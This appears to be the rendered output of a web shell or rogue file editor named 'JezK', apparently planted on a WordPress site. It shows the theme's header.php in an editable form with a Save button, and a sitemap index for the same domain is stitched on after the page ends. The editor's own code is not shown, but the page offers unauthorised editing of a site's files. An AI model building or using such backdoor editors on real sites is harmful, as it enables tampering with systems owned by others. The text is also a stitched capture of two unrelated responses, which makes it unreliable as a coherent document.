
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: header.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * The template for displaying the header
 *
 * This is the template that displays all of the &lt;head&gt; section, opens the &lt;body&gt; tag and adds the site&#039;s header.
 *
 * @package HelloElementor
 */
if ( ! defined( &#039;ABSPATH&#039; ) ) {
	exit; // Exit if accessed directly.
}

$viewport_content = apply_filters( &#039;hello_elementor_viewport_content&#039;, &#039;width=device-width, initial-scale=1&#039; );
$enable_skip_link = apply_filters( &#039;hello_elementor_enable_skip_link&#039;, true );
$skip_link_url = apply_filters( &#039;hello_elementor_skip_link_url&#039;, &#039;#content&#039; );
?&gt;
&lt;!doctype html&gt;
&lt;html &lt;?php language_attributes(); ?&gt;&gt;
&lt;head&gt;
	&lt;meta charset=&quot;&lt;?php bloginfo( &#039;charset&#039; ); ?&gt;&quot;&gt;
	&lt;meta name=&quot;viewport&quot; content=&quot;&lt;?php echo esc_attr( $viewport_content ); ?&gt;&quot;&gt;
	&lt;link rel=&quot;profile&quot; href=&quot;https://gmpg.org/xfn/11&quot;&gt;
	&lt;?php wp_head(); ?&gt;
&lt;/head&gt;
&lt;body &lt;?php body_class(); ?&gt;&gt;

&lt;?php wp_body_open(); ?&gt;

&lt;?php if ( $enable_skip_link ) { ?&gt;
&lt;a class=&quot;skip-link screen-reader-text&quot; href=&quot;&lt;?php echo esc_url( $skip_link_url ); ?&gt;&quot;&gt;&lt;?php echo esc_html__( &#039;Skip to content&#039;, &#039;hello-elementor&#039; ); ?&gt;&lt;/a&gt;
&lt;?php } ?&gt;

&lt;?php
if ( ! function_exists( &#039;elementor_theme_do_location&#039; ) || ! elementor_theme_do_location( &#039;header&#039; ) ) {
	if ( hello_elementor_display_header_footer() ) {
		if ( did_action( &#039;elementor/loaded&#039; ) &amp;&amp; hello_header_footer_experiment_active() ) {
			get_template_part( &#039;template-parts/dynamic-header&#039; );
		} else {
			get_template_part( &#039;template-parts/header&#039; );
		}
	}
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://tiffingrab.ca/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-posts-product-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_cat-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-taxonomies-product_tag-1.xml</loc></sitemap><sitemap><loc>https://tiffingrab.ca/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
